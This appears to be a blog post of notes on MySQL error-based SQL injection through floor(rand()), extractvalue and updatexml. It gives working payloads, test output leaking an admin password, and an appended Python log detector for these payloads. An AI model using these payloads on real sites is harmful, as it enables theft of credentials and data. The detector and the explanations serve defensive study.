Posting some of my old notes. When MySQL executes a statement it throws an error message, and PHP+MySQL sites often print that error text straight onto the page, so specific data can be retrieved by constructing queries in the following three ways.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()
The following payloads can be used (the first one was missing its opening parenthesis after "and"; it is balanced here so it matches the tested statement below):

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id input is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As you can see, the MySQL version is disclosed in the error text. The error occurs because the GROUP BY key built from floor(rand(0)*2) is evaluated again when the row is inserted into the temporary aggregation table, so the same key collides and MySQL echoes the colliding key, which carries the concatenated data. To query other data, change the subexpression in the position where version() sits.
For example, to retrieve the administrator's user name and password:
Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
(The trailing 1 in 'admin8881' is the floor(rand(0)*2) value appended by concat; the password itself is admin888.)
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
(0x5c is a backslash; it makes the XPath expression invalid so the error message quotes the whole string, including the selected value.)
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
(0x5e24 is the marker pair "^$", which is why it frames the leaked value in the error text.)
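From the defender's side, the three primitives above leave two recognisable traces: the injected functions in the request and the leaked MySQL error text in the response. The following Python detector is an added example, not code from the original post; it flags those traces in constructed access-log lines and a constructed response body (the log format, file names and sample values are assumptions).

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the three primitives in the post. The floor() trick
# needs a rand()-derived GROUP BY key; the two XML functions are flagged by name.
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\(", re.I)
GROUP_BY = re.compile(r"\bgroup\s+by\b", re.I)
XML_FUNCS = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Response-side signatures: the MySQL error text a PHP page leaks on success.
LEAKS = [
    ("floor_duplicate_key", re.compile(r"Duplicate entry '([^']*)' for key 'group_key'")),
    ("xpath_error", re.compile(r"XPATH syntax error: '([^']*)'")),
]

def classify_request(log_line):
    """Return the error-based primitives found in one access-log request line."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return []
    uri = unquote_plus(m.group(1))          # decode %xx and '+' before matching
    hits = []
    if FLOOR_RAND.search(uri) and GROUP_BY.search(uri):
        hits.append("floor_rand_groupby")
    hits.extend(f.lower() for f in XML_FUNCS.findall(uri))
    return hits

def find_leak(body):
    """Return (kind, leaked_text) if a response body echoes a MySQL error carrying
    query output, else None. The backslash / ^$ markers and the trailing 0/1 digit
    from floor(rand(0)*2) belong to the payload, not to the leaked data."""
    for kind, pat in LEAKS:
        m = pat.search(body)
        if m:
            return kind, m.group(1)
    return None

def scan(log_lines):
    """Map each suspicious line index to the primitives it carries."""
    return {i: hits for i, line in enumerate(log_lines) if (hits := classify_request(line))}

# Constructed sample access-log lines and response body (not from the original post).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 200 734',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /article.php?id=1+and+extractvalue(1,concat(0x5c,(select+table_name+from+information_schema.tables+limit+1))) HTTP/1.1" 200 690',
    '10.0.0.9 - - [01/Jan/2024:10:00:11 +0000] "GET /article.php?id=1+and+1%3D(updatexml(1,concat(0x5e24,user(),0x5e24),1)) HTTP/1.1" 200 688',
]
SAMPLE_BODY = "Warning: ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"
```

Run scan(SAMPLE_LOG) and find_leak(SAMPLE_BODY) to see the three payload lines flagged and the version string recovered from the error text; the same checks applied to a WAF or log pipeline catch the attempt before and after the leak.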
That's all; thanks to the foreign guys.